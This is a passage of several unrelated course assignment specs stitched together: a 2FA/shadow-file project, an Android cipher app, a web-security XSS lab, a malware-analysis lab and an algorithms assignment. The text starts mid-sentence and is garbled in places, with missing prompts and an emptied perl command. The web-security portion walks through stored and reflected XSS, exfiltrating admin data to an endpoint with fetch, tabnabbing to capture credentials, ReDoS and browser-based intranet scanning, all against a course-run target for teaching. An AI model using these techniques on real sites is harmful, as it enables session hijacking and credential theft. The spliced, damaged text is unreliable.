Georgia Tech) but in this project, the same TG will serve as a second factor source for all accounts you create. For this to be possible, a user must be registered with TG along with a PIN.Thus, each user has two accounts:The Token Generator and the 2FA Method are described first. Details regarding what you must implement are provided in Implementation of 2FA.Before moving to the 2FA method, it is important to know the working of TG. It gives a user three options – ‘1’ for registering a new user, ‘2’ for generating token for the current/registered user and ‘3’ for deleting an existing user account.NOTE: You have been provided with the Token Generator (TG) executable. You only have to understand how it works so that you can use it as a black box in your project. You do not have to implement the Token Generator.If user enters: ‘1’ then‘2’ then‘3’ thenNOTE (Very Important!!!): After execution of each option in TG, the user will be prompted for confirmation of the requested task in the 2FA method. If the task in 2FA method, for which tokens are generated using TG is completed successfully, the user must enter ‘y’ or ‘Y’. If the user enters some other character, then the TG will revert itself to the previously known state for the user. First, when user U tries to create an account, 2FA login method requires a user to provide three things, username U, password P (confirm password), salt, and the initial token IT generated by the TG when registering a user account for user.NOTE: The PIN for the TG and the password for 2FA system should be different. But the username for the 2FA system and the user-id for the TG should be the same.The 2FA login method will take this token IT, concatenate it with the provided password P and this will be the hardened password (P+IT) that goes into the password hashing algorithm to generate an entry in the shadow file. With this entry, the new user will be successfully created. The whole process can be visualized as shown in Figure 2[Appendix Section]:After a user U is created, he/she can log into his/her account. For login, a user must provide username U, password P, current token CT from the token generator and next token NT from the token generator[2].2FA method first checks if the user U exists. If yes, it will then concatenate the password P and current token CT to construct the hardened password(P+CT), as done above in user creation. This hardened password will be used for validating against the hash value in the user entry in /etc/shadow. After successful validation, the user entered password P will be concatenated with the next token NT to create the new hardened password (P+NT). This new password is then hashed, and this new hashed value is used to update the corresponding field in the /etc/shadow file. Based on successful or failed execution of above request, the user will enter the response in the TG, which will decide whether the changes will be saved or discarded. The full functionality of 2FA is visualized in Figure 3[Appendix Section].2FA should be able to update the user’s password. This deals with the situation when a user’s password is compromised, or a certain amount of time has elapsed since the password was created. For update, a user must provide username U, password P, new password NP (confirm new password), new salt NS, current token CT and next token NT from the token generator.2FA should also be able to delete user’s account. For delete, user must provide username U, password P and current token CT. Update and delete functionality should be extrapolated from login functionality. IMPORTANT: Follow the prompts exactly as the instructions below. We will not accept regrade requests based on incorrect prompt order.After becoming familiar with the working of the 2FA method and TG, you must create a standalone program based on the functionality of 2FA method. Please start from the python code that we have provided. Your code must implement the prompt below in the exact order.Your program should be capable of handling the following steps:Select an action: Also, prompting the user for appropriate inputs such as username, password, salt, and tokens is also needed. Prompt for action number 1 (create user): Username: AlicePassword: Alice123 Confirm Password: Alice123 Salt: salt0123Initial Token: eYKCaN0kLB7T0.3Q.vPs40 Prompt for action number 2: Username: AlicePassword: Alice123 Current Token: eYKCaN0kLB7T0.3Q.vPs40 Next Token: iGxl329/ugOeSnhOzYE1B/ Prompt for action number 3: Username: AlicePassword: Alice123 New Password: New-Password Confirm New Password: New-PasswordNew Salt: salt3210Current Token: eYKCaN0kLB7T0.3Q.vPs40 Next Token: iGxl329/ugOeSnhOzYE1B/ Prompt for action number 4: Username: AlicePassword: Alice123 Current Token: Gxl329/ugOeSnhOzYE1B/ NOTE: The salt will be same for a user account unless the user updates the password or deletes it and then creates it again.Username: AlicePassword: Alice123 Current Token: eYKCaN0kLB7T0.3Q.vPs40 Next Token: iGxl329/ugOeSnhOzYE1B/ Deleted”.Please keep the following in mind as you work on the project. Complete a security analysis for the implemented 2FA method. More specifically, o Your answers for Task2 under section “Task2” FIGURES Figure 2: Creating an Account Figure 3: Logging into an AccountGETTING STARTED ON LINUX LOGIN/PASSWORDS When the Linux system creates a user, it prompts the user for a password. Then, based on the version of Linux, one of six algorithms are chosen for password encryption. The system generates a random salt and uses that salt to generate a one-way hash and store that hash with user details in /etc/shadow file. The user entry looks like the below-given example: As you can see the user entry consists of 9 fields, each separated by the “:”. The first field is the username and the second is hash. The hash contains 3 other fields separated with the dollar sign (“$”). The first field tells us about the hashing algorithm used, in this case, “6” denotes SHA-512. The second field is the salt value used to make hash value unique. The last field is the hash of the combination of your salt and password. You can easily verify the generation of hash by using the perl one-line script on your Ubuntu terminal.perl -e ‘print crypt(“”,”$$$”) . “ ”‘Here, =cs6238=6=UPICuFgRNote: Explore all other fields as you will need to know them for project.After storing the hash entry in file /etc/shadow, the system will create a home directory and a user entry in /etc/passwd file which stores essential information required during login, i.e., user account information. This file contains one entry per line for each user. An entry in /etc/passwd for user cs6238 is looks like: Each entry in /etc/passwd has seven fields, each separated with “:”. The first field contains the username. The second field contains the password for the user. “x” denotes that the hashed password entry is in the shadow file. Next two entries are of uid and guid. Last two entries are home directory of the user and the absolute path of the command shell. We are not going to discuss passwd file contents in detail as for the project it is sufficient to know what in the passwd file. However, you are welcome to further explore details of passwd files. After updating the entry in passwd file, user creation completes.[1] By now, you should know how to import a VM. If not, please visit: https://docs.oracle.com/cd/E26217_01/E26796/html/qsimport–vm.html. [2] Ideally, these tokens should be obtained without any user effort but to simplify the project, you will provide these tokens manually (e.g., cut and paste).The project writeup is available here: Project2.pdfActionsThe project VM can be built by the student:https://ubuntu.com/download/desktopLinks to an externalYou can follow this guide:Ubuntu-Installation.pdfDownload Project_1.zipThen download and extract this folder into your Desktop folder in the VM:git clone https://github.com/TA-gatech/Project2.gitIf you have any questions please join the TA office hours or post them to Ed Discussion Ed Discussion also has links and mirror links to a pre-installed VM.cs6238.ovaLinks to an external site.Project 2 Walk through:Coming Soon!Good luck! RubricSome Rubric Total Points: 100
In this assignment, you will develop a simple Android app, SDPEncryptor, that encrypts messages using a simple affine cipher. Before you make an ed post or communicate with your peers about this assignment, read ‘Guidelines for Communicating’ near the end of this assignment spec; failure to follow said guidelines may result in a points deduction. Configuring your Android Studio development environment is itself a key learning objective; it lays the groundwork for the group project. Spending 70 to 90 % of your time on this setup is normal.The app should generate suitable error messages by calling EditText’s setError method (inherited from TextView) on the appropriate EditText widget when the computation is triggered (i.e., the button is pressed). If done correctly, this will result in (1) an error mark () on the right-hand side of the text field and (2) a floating error message whenever the field has focus, as shown in the error screenshots below. It is possible to have more than one error active at the same time, as shown in the screenshots below. There are three error situations: For illustration, we are providing several mockups for a possible implementation of the app: We suggest that you try to generate a user interface (UI) similar to the one shown above, but you don’t have to. However, you must make sure to use the exact same identifiers we provide below for your widgets. This is very important, as we will use these identifiers to check and auto-grade your app. Note the package name: “edu.gatech.seclass.sdpencryptor”Note the language: “Java” (Kotlin is allowed, but our ability to support problems you may encounter will be limited) Note the minimum SDK: “API 34: Android 14”Note the build configuration language: “Groovy DSL (build.gradle)” (You must use this exact build configuration language) android { // … compileSdk 34 defaultConfig { // … minSdk 34 targetSdk 34 // … } // … compileOptions { sourceCompatibility JavaVersion.VERSION_17 targetCompatibility JavaVersion.VERSION_17 } }implementation ‘androidx.appcompat:appcompat:1.4.1’implementation ‘com.google.android.material:material:1.5.0’implementation ‘androidx.constraintlayout:constraintlayout:2.1.4’testImplementation ‘junit:junit:4.13.2’testImplementation ‘org.robolectric:robolectric:4.11.1’ android {// … testOptions { unitTests { includeAndroidResources = true }}// …} android {//…lintOptions {tasks.lint.enabled = falseabortOnError false}} Note: “SDPEncryptor” (without space) and “SDP Encryptor” (with space) are both acceptable As for all other assignments, we check for plagiarism. Unfortunately, there are plagiarism cases every semester. Please keep in mind that the tools we use to identify cases of plagiarism have access to the same online resources that are available to you.TL;DR (Checklist) [1] We performed our testing and created these instructions using Android Studio Ladybug Feature Drop | 2024.2.2. Your windows may look slightly different from the ones we provide if you are using a different version.[2] Be careful when extracting the files, as a conservative program may create a second “SDPEncryptor” directory (e.g., “SDPEncryptor 2”). If that happens, make sure to move the files to their right location.
You can find the due date and how to turn in your solution located on the Canvas assignment page and Ed discussion. You’ve been invited to the CS6262 security club; welcome! The security club has a new official website we use for sharing information and resources. Unfortunately, the last administrator was too busy and didn’t perform any security audits on the website. Oh no!The club’s security team wants you, the club’s newest member, to deliver a full security audit of our new official website. You’ve been tasked to provide a pen-testing report to the club’s security team. You’ve received this message to start you off:“Hi there! The club’s website can be found at https://cs6262.gtisc.gatech.edu. We’ve integrated the GT Single-Sign-On service, so please sign in with your GT account and it will create a user for you. The website is not complicated. It is a simple Content Management System (CMS) with several features enabled, e.g., text search, dark mode, rich text editor, etc. Good luck auditing! The CS6262 Security Team” Let’s first orient ourselves on the website. The project website is located at cs6262.gtisc.gatech.edu – type this into your browser. We recommend using the latest version of Google Chrome. To trigger an XSS attack on the admin side, fill in the URL of your post and submit to the admin role. It will create or override the current running browser instance, which means when it’s messed up, you can submit a URL to override the current one. To trigger an XSS attack on other users’ sides, fill in the URL of your malicious payload. The user instances also override the current one when you submit new URLs. The admin instance will be used for task 4 and task 5.2. The user instance will be used for task 5.3. iii. Check “Restart the ReDoS instance” to launch the ReDoS server again when you feel like the server is not responding to your submission. Here are the two approaches. Note: Fill up the questionnaire and submit required files onto GradeScope. Modern browsers will provide DevTools for front-end developers to debug and tune the performance when developing a website. Attackers can also use these tools to explore and collect information. Open your Chrome and press F12 to open the developer console. DevTools will popup. Here you can run JavaScript in the console, view the source html of the webpage, capture the network traffic, and other functionalities. Try to explore it by yourself. 1.2 console.log() console.log() is commonly used to print information into the console of the developer tools for debugging purposes. Open the devTool and type console.log(“yourGTID”); You can see your GTID is printed in the console. 1.3 setInterval setInterval is used to fire a function given a frequency. It will return an intervalID which can be passed to clearInterval to cancel the interval. Question: Given a variable var counter = 5, make use of setInterval and clearInterval to reduce the counter to 0 in every second and then stop. You can run your code in devTools to verify.var counter = 5;// Your code below 1.4 setTimeout setTimeout will fire a function after the delay milliseconds. The function will only be fired once. Similarly you can use the returned timeoutID and clearTimeout to cancel the timeout. Question: Given a variable var counter = 5, make use of setTimeout to reduce the counter to 0 in every second and then stop. You can run your code in devTools to verify.var counter = 5;// Your code below 1.5 Promise A Promise is an object used for async operations in JavaScript. There are three states in a Promise object: Pending, Fulfilled, and Rejected. Once created, the state of the Promise object is pending. So the calling function will not be blocked and continue executing. The Promise object will eventually be fulfilled or rejected. Then the respective resolve or reject function will be called. Below is an example of a Promise. Before running the code, can you tell what the output would be? Can you explain why? Which of the following options can adjust iframe’s width and height correctly? FAQ Please make sure that you have correctly set your username in the questionnaire. Find where to exploit a reflected XSS and fill in the questionnaire URL by visiting which an alert should trigger. Reflective XSS is an attack where a website does not return requested data in a safe manner.Reflective is generally an XSS attack where the attacker sends the victim a link to a reputable website. BUT, this link contains malicious javascript code. For example,https://www.facebook.com/login?username=username&password=passwordsteal-yourinformation.jsIf the website returns the data in an unsafe manner (does not sanitize the output) and the victim clicks on this link, then the malicious code will be executed in the context of the victim’s session. The content of the alert doesn’t matter. For example, https://cs6262.gtisc.gatech.edu/endpoint…yourpayload is what you need to fill in the questionnaire. The autograder will visit your URL. If it detects an alert, then you will receive full credit. After finding the exploitable place from task 2, you understand you can infect others by sending them links. But sending links is costly and people may not click on them every time. Therefore, instead of sending a link required in task 2, you find you can actually modify the payload and let the payload live in this web app forever. As long as a user clicks on the link you send once, she is infected persistently unless the payload is cleared. After learning some types of XSS, you may think how I can make my attack as persistent as possible on the client’s side if the website doesn’t have a Stored-XSS vulnerability exposed to regular users. As Web technology evolves, more and more applications start to focus on user experience. More and more web applications, including cross platform Electron applications, are taking over desktop applications. Some user’s non-sensitive data is now stored on the client-side, especially the look and feel preferences of an application, to let the App load faster by remembering the user’s preferences without passing back small data chunks. (You can learn more how prevalent this unsafe design is nowadays by reading the paper Don’t Trust The Locals: Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the Wild) Then, the variable is read by an unsafe sink, e.g. eval, element.innerHTML(data). Inspect what is stored locally for the web application, cs6262.gtisc.gatech.edu, and how it is used. Tools you may need: Now, modify the payload in the link from task 2 and fill the updated URL in the questionnaire. Deliverables The website, https://cs6262.gtisc.gatech.edu, allows users to create articles. As a user, one needs to submit the post to a moderator who is the admin of the website for approval. This might be an interesting point to investigate whether you can inject something so when the admin is reviewing your post, thereby you can hijack the admin’s login session. This website uses a rich text editor which not only enables styled content but sanitizes the user’s input while preserving its style. In this task, you will submit a post with an injected payload that launches XSS attached to an admin user. Then, you need to steal some information that is only visible to an admin. Stored XSS is an attack where a website does not store data in a safe manner. An attacker could then store malicious code within the website’s database. Said code could be executed whenever a user visits that website. So, a post for an admin’s approval seems like something you will be interested in. If you can steal the admin’s login session cookie, you can login as her to see what she can see. Recall from the lecture that when a cookie has httpOnly, it is not exposed to the document object. This cookie cannot be accessed by JavaScript. What would you need to do to read information out as the cookie’s owner? This httpOnly flag is a good way to prevent JavaScript from reading sensitive cookies. However, it doesn’t mean it can mitigate XSS attacks. Attackers, having malicious scripts running in the victim’s browser, are still able to send requests and forward the responses to themselves. Even though the website is protected by CSRF tokens, attackers can still manage to post malicious payload pretending to be the user. “fetch(‘https://your_endpoint_address/’, {method: ‘post’, body: ‘hi’})” will help you verify the correctness. Then, you should be able to see this after opening your endpoint in a new tab. In this way, you should be able to read data out of the website and send it to your HTTP endpoint. IMPORTANT We will thoroughly review your code for plagiarism. It is not recommended to use any LLM or codingassistant AI since these small snippets often produce similar coding styles and results. If you are not familiar with the basics of HTTP and JavaScript, learning how to use fetch in an async chain can be helpful. You may read the examples in this documentation:https://developer.mozilla.org/en-US/docs/Web/API/fetch Also, before posting your write-up, please switch back to the “normal” mode to ensure it works. Logging in as an admin is difficult since the website is well-configured to prevent it from happening, even if you have the cookie. An easier way is to “see” the admin’s console page (via your exploit script) and locate the “Information Theft” input box. Looking into the HTML of the page, you will know how you can instruct the admin (again, using your exploit script) to help you to get the hash. The autograder checks your script. Please make sure you have submitted it correctly. Also, please make sure your submission strictly follows the format guideline. A possible reason is that some residual malicious code/scripts are still left on the website, e.g., your local storage or endpoint/inbox. Please clean all the cache and local storage of the website and clean your endpoint/inbox. You can clean your endpoint/inbox by posting tons of messages to your inbox or redoing your Q1.5 in Task 1. You just have learned how to exploit XSS in various ways. In this task, you will learn what XSS is capable of. You’ve learned from the DoS lecture that GitHub was attacked in March 2015. Those flooding requests came from browsers! Application layer DoS attacks are difficult to stop because a request sent by a bot is the same as a request from a legitimate user. Common mitigation against request flooding is applying challenges like reCaptcha. What if we can still exhaust the server’s resources without flooding requests? A throttle to frequent requests won’t be able to stop it! Regular Expression Denial of Service (ReDoS) is one type of application layer, DoS. Due to the nature of single-threaded JavaScript and its event-loop architecture, if an event takes a long time to execute, the JavaScript thread will not be able to process other normal events. Imagine what if it takes 5 seconds to check a single regular expression. It impacts other users’ experiences severely since the web server is so busy processing the single regular expressions which result in a denial of service to other users. Here are some references: https://www.cloudflare.com/learning/ddos/application-layer-ddos-attack/ https://en.wikipedia.org/wiki/ReDoShttps://sec.okta.com/articles/2020/04/attacking-evil-regex-understanding-regular-expression-denialserviceFreezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers Read the references above to understand what ReDoS is and its impact. In this task, you will try one kind of ReDoS attack. You will find the ReDoS section on the console page. Try to compose a username and password combination to launch a ReDoS attack against the ReDoS server. When an attack is successful, a hash value will be available for you to submit. The username can be a regular expression.Read the materials above, and you will find the solution. Network work scanning has been well studied. You have practiced Nmap in Project 1. In order to scan the intranet using Nmap, you need access to a host in the intranet, which is quite difficult in general. However, by leveraging a user’s browser running on a host inside the intranet, you are still able to scan the intranet by injecting malicious scripts. There are some interesting materials related to intranet scanning using a browser. These vulnerabilities were mitigated since they were disclosed. However, given the common incorrect “Access-Control-Allow-Origin” setup in an intranet network, you may be lucky to sniff something from your target’s local network. As we learned from the lectures, a DNS rebinding attack allows an attacker to bypass SOP, thereby the attacker can read content from intranet web servers. But before launching a DNS rebinding attack, one must know what web servers are available in that organization. A local webserver scanning can help the attacker determine the targets. Now, assume you, as the attacker, have already learned the local IP address range below. And your goal is to determine what IP addresses are serving web content. (Recall the port number or protocol name for serving web content.) A web server will respond “hello” in plain text. The local host IP range is from 172.16.238.4 to 172.16.238.255, which is what you need to scan. These hosts are not accessible from outside as it’s only accessible to the victims – a user or an admin. Deliverables You will get 15% for all correct IP addresses and 0% for all incorrect. IMPORTANT We will thoroughly review your code for plagiarism. It is not recommended to use any LLM or codingassistant AI since these small snippets often produce similar coding styles and results. Here are some references to cross-origin vulnerabilities:https://portswigger.net/web-security/cors/access-control-allow-originhttps://www.pivotpointsecurity.com/blog/cross-origin-resource-sharing-security/ These two articles below are related to using WebRTC to scan from a browser because of the mechanism of establishing a peer to peer connection if you are interested. These are past-tense anyways, but you are welcome to think of any new ideas related to this. A Browser Scanner: Collecting Intranet Information https://medium.com/tenable-techblog/using-webrtc-ice-servers-for-port-scanning-in-chromece17b19dd474 Reviewing your answer to Q2.3 in Task 1 may help. Please make sure that it’s the admin who runs your script. This IP is only accessible by the admin. Also, please specify the correct protocol name or port number. (The server serves web content, as mentioned in our write-up.) In this task, you are determined to steal other users’ credentials. As per an online survey, you learn people open 10~20 tabs on average to surf the Internet. Therefore, you think tabnabbing, one of the phishing attacks that lure users into giving up their credentials, could be a good social engineering attack vector. Here are some references about what tabnabbing is. https://owasp.org/www-community/attacks/Reverse_Tabnabbinghttps://en.wikipedia.org/wiki/Tabnabbinghttps://medium.com/@shatabda/security-tabnabbing-what-how-b038a70d300e Given restrictions https://cs6262.gtisc.gatech.edu has and you being able to exploit the XSS vulnerabilities only, you have to implement a variant of tabnabbing following the requirements below. Message Receiver Endpoint.And, the URL in the address bar should NOT change for the opener tab. Vigilant users may also look at the address bar to determine whether the URL is correct. So, it’s better to keep the original URL to get the user’s trust. HTML body, create an iframe for the tabnabbed page usingdocument.createElement(‘iframe’), and attach this DOM to the HTML body. Avoid using document.write(…) as it obstructs our bot from filling in the username and password. IMPORTANT We will thoroughly review your code for plagiarism. It is not recommended to use any LLM or codingassistant AI since these small snippets often produce similar coding styles and results. If your attack changes the webpage after the victim switches back to the attacked tab, the user bot may not be able to fill in the form. Please make sure that the webpage content is changed right after 60 seconds (the victim switched to another tab) and before the victim switches back. When a tab does not have focus, setInterval running inside has a lower resolution. This issue may worsen on user bots when our server runs under pressure. Please be aware of it when you write your script. If the login user to your tabnab page is not the user bot, it will send a wrong hash to your endpoint. Please ensure that it was the user bot who logged in to the tabnab page but not any other users, e.g., you being the victim of your script. Other tips: Do not use window.open for opening a new window (when the victim clicks a link). All submissions will go to GradeScope where an autograder will help you understand the correctness of your solution.The autograder will deduct points for files that are not uploaded. You can upload an empty file if you haven’t gone that far yet, or just ignore the points deducted. Make sure you upload all the files when you are done. Please do not expect TAs to debug your code or provide a walkthrough for the tasks, as you are expected to master the low-level details when you complete this course. Due to our limited bandwidth, we also do not entertain questions answered in our FAQ unless you explain why the FAQ cannot resolve your issues. If you suspect there are issues with our web server or the autograder, please provide details so that we can resolve the issues more efficiently. You can clean your endpoint/inbox by posting tons of messages to your inbox or redoing your Q1.5 in Task 1. Please make sure that you have correctly set your username in the questionnaire. We strongly advise that you DO NOT rely on any AI chat bots or similar AI platforms to generate a solution. Not only does the AI bot forfeit your chance to learn something, but such solutions do not correctly cite sources and are often too like those of other students who also utilize AI bots. Regardless of your intention, we treat them all as plagiarism if we detect very similar solutions. We have kept improving this project for many years. And so many students successfully finished this project. Most unhappy cases are due to typo mistakes, syntax errors in the submitted solution, or misunderstanding of the attack concept. Unlike typical computer system courses, the environment for this project will be out of your control, and you will drive off-road. So, you cannot assume the victim’s environment is the same as yours. If something does not work as expected, we advise you to inspect your code line-by-line (e.g., putting a log message line-by-line) and review the given materials (e.g., tips, videos, other students’ posts, etc.). We don’t debug your code. Learning the attacker’s mind is one of the goals of the project. Although you don’t have server access for debugging, you can inject a script into the project server. Using log messages in the injected script, you can figure out the server’s status (e.g., where it gets stuck) by transferring the log messages from the server to your endpoint.
“Good work on that last assignment!” Your boss seems delightfully cheery today. “The client was very impressed by your skills and has requested that you help them with another engagement.”This is great news, you are already impressing your boss.“They recently found some malware on their servers, and want you to provide a report on its behaviors. From what I’ve seen, our team has never encountered some of these malware before…”This seems like less great news.“Anyways, I expect a report on my desk in 2 weeks!”It seems like its back to reading the documentation for you. AssignmentThe purpose of this assignment is to evaluate your ability to find certain behaviors of a piece of malware using various static and dynamic malware analysis tools.You will need to use the malware lab environment we have provided to create a report on all of the trigger commands and behaviors of each command for the provided malware. Please refer to the tutorial presentation to get started!Feel free to adjust the VM’s memory space after download.In your report, you will need to answer the following questions:VM Link:GoogleDrive:https://drive.google.com/open?id=1a_1U2UQKQ0268NApFnFHfV2HETZZEu4ZLinks to an external site.OneDrive: https://gtvault-my.sharepoint.com/:u:/g/personal/dzhang377_gatech_edu/EZh748ZHXvBGlenulVmCtQgB9WF16wAL-kOAf-niaVG1YA?e=m2Z3zDLinks to an external site.MD5hash: 72ff81b5b73b2297c8d64f0c09ecc03dSupplementary Material:Lab 2_Supplementary_Material.pdf DeliverablesPlease submit a .tar.gz file containing the report, Angr scripts and proof of concrete execution. Name this “[username]_lab02.tar.gz”. Please include the following in this .tar.gz file:Sample Structure after unzip: Warning:Please don’t run the malware on your own computer! We are not responsible if you do. Only execute it inside the Windows VM we are provided. These are real world malware samples. ○ View assembly in disassembler○ Find dispatcher code○ Symbolic analysis○ Dynamic analysis○ In the VM, Ghidra is located at ~/ghidra_9.1.1_PUBLIC/○ After you cd into that directory, run Ghidra with ./ghidraRun○ A project has already been created for you, so all you need to do is import the binary to the project by clicking File > Import File > Select binary to import○ Code will be presented as assembly instructions on the left half of the interface and reconstruction C instructions on the right half of the interface○ For this project, being able to read assembly is not required, but can be helpful■ Generally, assembly instructions come in the form of an instruction name followed by 1, 2, or 3 operands■ For example, the PUSH instruction will push a value onto the stack. Since you can only push 1 item to the stack at a time, the instruction takes 1 operand■ This operand can be a value or the name of a register: the value will be pushed to the stack if a value is used as the operand while the value inside the register will be pushed to the stack if the register is chosen as the operand instead■ i.e. “PUSH %eax” means that the computer will push the value inside the EAX register to the top of the stack. Now, if you get the value at %esp (the stack pointer) or pop a value off of the stack, you will get whatever value you just pushed○ A good reference for x86 assembly can be found here○ In the folders on the very left of the UI, you can find all the functions within the binary. Explore these to find out more about what the malware will do (not necessary)~/ghidra_9.1.1_PUBLIC/support/analyze.sh ○ We first need to find what we can tweak in our input to this function so that it will behave differently○ In the binary, we find that the execution of the dispatching logic (not function) is dependent on the value stored at %eax○ Looking at the C representation of these basic blocks confirms this observation, given the big if-statement being dependent on the “pcVar1” variable○ In our C representation, we can also see that the “pcVar1” variable is dependent on the 1st parameter of the function, giving us a candidate to symbolically represent! ○ The script is found at ~/Desktop/symbolic_execution/sample_inputs.py○ All we need to do is give it the start of the function (0x804d32) and the address at which we want our program execution to end up○ In this case, we wish to end up at the function call inside the if-statement at 0x804dde because we believe that it will execute malicious behaviour○ We can easily find these addresses by clicking specific lines in our C code representation on the right and the address will be highlighted on the left○ Now, if we execute python sample_inputs.py –start 0x804d32 –end 0x804dde, it will print 1 parameter for the dispatching function that will hit the inside of the if-statement○ Again, we will use a simulation manager like the one used in Lab 1 with a claripy solver○ However, we will specify a call state to call the specific dispatching function with the argument that we will inject ourselves■ target_state = proj.factory.call_state(start, sym_arg_1)○ Then, the code will symbolically execute dispatching function again and again until an the symbolic argument causes the program to reach the inside of the if-statement, and we now find one such argument of the dispatcher!Print out the argument that allowed the execution engine to reach the target address○ Thus, if we want to find all such inputs from the command server that will trigger the dispatcher logic, we must put inverse constraints on the function argument after we find each new command○ We can do this one of two ways:■ Adding a constraint before evaluation (i.e. before .explore() is called)■ Adding a constraint after evaluation○ This way, we will iteratively find each triggering parameter ○ After logging into the Windows sandbox, we can find DynamoRIO already installed○ This is a dynamic execution engine that not only keeps tracks of the actions being taken by the binary when run inside of the engine, you can customize the actions it takes upon reaching a certain behaviour from the binary○ These customizations can be found in C:codeconcrete_executor○ For sample.exe, we would like to change libcall_handler.cpp to change what the engine will do when a function is called○ First, we would like to specify the function (i.e. the dispatcher function) we want to wrap and start monitoring from○ Then, we would like to wrap the input before the function is called so we can define the input to a given function○ Of course, we will need to add these method traces to the .h file to follow C++ conventionSymbolic Analysis (cont.)○ Once this code has been changed, we first rebuild the scripts with .build.bat○ Now, we can python run.py to run the dynamic analysis engine○ Once the execution is complete, we can view the output of the engine in the folder you specified○ In the below example, our input caused the malware to attempt to read many files○ Of course, it is never going to be that easy as some functions may require extra logic in order to execute fully○ If nothing happens after executing with a correct input, you may need to go back to the disassembled code to see if there are any additional requirements to fully analyze the malware behaviourIntroduction to Assemblyx86 Assembly/X86 Instructions – Wikibooks, open books for an open worldClaripy (not as important, but check #claripy-asts if you want to find other constructs you can use to constrain the solver)Claripy – angr DocumentationSolver Engine (#constraint-solving is helpful for figuring out how to set constraints)Solver Engine – angr DocumentationSystem overview https://dynamorio.org/dynamorio_docs/overview.html Existing tools based on DynamoRIO:https://dynamorio.org Tutorial:https://dynamorio.org/tutorials/ Library tracing:https://github.com/mxmssh/drltrace DynamoRIO discussion group:https://groups.google.com/g/dynamorio-users Code Manipulation API:drwrap_wrap:(primary function that students need to use in project 2 dynamic analysis) https://dynamorio.org/dynamorio_docs/page_drwrap.htmllist of sample use cases for dynamoRIO https://dynamorio.org/dynamorio_docs/API_samples.html
Your program will be tested using automated test scripts. It is therefore critically important that you name your files and functions as specified in this document. If you do not, it will make your submission difficult to mark, and you will be penalised.SUBMISSION REQUIREMENT: You will submit a single Python file containing all of the questions you have answered, assignment2.py. Moodle will not accept submissions of other file types.ACADEMIC INTEGRITY: The assignments will be checked for plagiarism and collusion using advanced detector(s). In previous semesters, many students were detected and almost all got zero mark for the assignment (or even zero marks for the unit as penalty) and, as a result, the large majority of those students failed the unit. Helping others to solve the assignment is NOT ACCEPTED. Please do not share your solutions partially or completely to others. Even after the deadline, your solutions/approaches should not be shared before the grades and feedback are released by the teaching team. Using contents from the Internet, books etc without citing is plagiarism (if you use such content as part of your solution and properly cite it, it is not plagiarism; but you wouldn’t be getting any marks that are possibly assigned for that part of the task as it is not your own work).The use of generative AI and similar tools for the completion of your assignment is not allowed in this unit! In fact they often hallucinate bad solutions.This assignment achieves the Learning Outcomes of:In addition, you will develop the following employability skills:In order to be successful in this assessment, the following steps are provided as a suggestion. This is an approach which will be useful to you both in future units, and in industry.For this assignment (and all assignments in this unit) you are required to document and comment your code appropriately. Whilst part of the marks of each question are for documentation, there is a baseline level of documentation you must have in order for your code to receive marks. In other words:Insufficient documentation might result in you getting 0 for the entire question for which it is insufficient.This documentation/commenting must consist of (but is not limited to):A suggested function documentation layout would be as follows:There is a documentation guide available on Moodle in the Assignment section, which contains a demonstration of how to document code to the level required in the unit.For all assignments in this unit, you may not use python dictionaries or sets. This is because the complexity requirements for the assignment are all deterministic worst-case requirements, and dictionaries/sets are based on hash tables, for which it is difficult to determine the deterministic worst-case behaviour.Please ensure that you carefully check the complexity of each in-built python function and data structure that you use, as many of them make the complexities of your algorithms worse. Common examples which cause students to lose marks are list slicing, inserting or deleting elements in the middle or front of a list (linear time), using the in keyword to check for membership of an iterable (linear time), or building a string using repeated concatenation of characters. Note that use of these functions/techniques is not forbidden, however you should exercise care when using them.Please be reasonable with your submissions and follow the coding practices you’ve been taught in prior units (for example, modularising functions, type hinting, appropriate spacing). While not an otherwise stated requirement, extremely inefficient or convoluted code will result in mark deductions.These are just a few examples, so be careful. Remember that you are responsible for the complexity of every line of code you write!The problem of class allocation is only becoming more and more difficult due to the current physical space constraints. There are many variables involved in the problem of allocating a unit’s classes to specific classrooms and times, and allocating students to specific classes such as:Given that physical space availability is currently the main bottleneck and that there are certain times of the day that are more preferred amongst students, the team responsible for managing the classroom spaces is considering placing stricter constraints on the usage of classroom space, based on the following general principles:And, of course, the university also wants to make students as satisfied as possible by allocating as many students as they can to classes in their preferred times/days of the week.The spaces admin team did a detailed analysis to set reasonable numbers for the minimum occupancy rate of specific classrooms during specific times of the day (based on the popularities of the classroom and the time slot). They have put a great effort in trying to come up with a draft allocation of classes to specific classroom spaces and times, but they have soon realised that verifying if it is possible to allocate the students accordingly to satisfy all the outlined constraints would be extremely hard to do manually. As they do not have a computer scientist in their team, they have asked for your help.Particularly, they have asked you to help them verify the draft allocation of FIT2004 applied classes to specific classrooms and times. There are twenty time slots in which FIT2004 applied classes can run each week, as they are three hours long. These time slots will be numbered0,1,…,19.You are given as input the following data:timePreferences[i] contains a permutation of the elements of set {0,1,…,19} to indicate the time slot preferences of student i. The time slots in timePreferences[i] appear in order of preference, with the time slot that student i likes the most appearing first.– proposedClasses[j][0] denotes the proposed time slot for the j-th class. Potentially, there can be multiple FIT2004 applied classes running in parallel. – proposedClasses[j][1] and proposedClasses[j][2] are positive integers that denote respectively, the minimum and maximum number of students that can be allocated to the j-th class to satisfy the space occupancy constraints.Your task is to write an algorithm that returns an allocation of each student to a proposed class. The returned allocation should satisfy the following requirements:To solve this problem, you should write a function crowdedCampus(n, m, timePreferences, proposedClasses, minimumSatisfaction):Your algorithm should have worst-case time complexity O(n2) and worst-case auxiliary space complexity O(n).Levenshtein Distance or Edit Distance is a metric to measure the difference between two words – the minimum number of single-character edits (insertions, deletions or substitutions) required to change one word into the other [1].You are an AI abuser and always ask an AI to do your assignment for you. However, the assignment forbids the use of AI and the AI is smart enough to ignore you no matter what you try to prompt it with. In fact, the AI is a troll and will provide wrong Python code and documentation with words that have Levenshtein distance exactly one from what it should be. Furthermore, it will only perform substitutions, and not insertions nor deletions.You have learned that AI cannot be trusted and therefore are now coding a Python program to identify words that have Levenshtein distance exactly one from what they should be when only substitutions are considered. You are implementing a primary data structure that will help you efficiently compute this, as per the following signature:Based on the class signature given earlier, you have the following inputs: • list_words is a list of N words, where the longest word has M characters and all of the characters in list_words add up to C. Thus, O(C) ≤ O(M ∗ N).The function check_word(self, sus_word) returns result – a list of the words from list_words whose Levenshtein distances to sus_word are equal to 1 when allowing only substitutions. If there are no such words, it would be an empty list [].Refer to the example(s) provided in Section 2.3. The function can also return everything as a 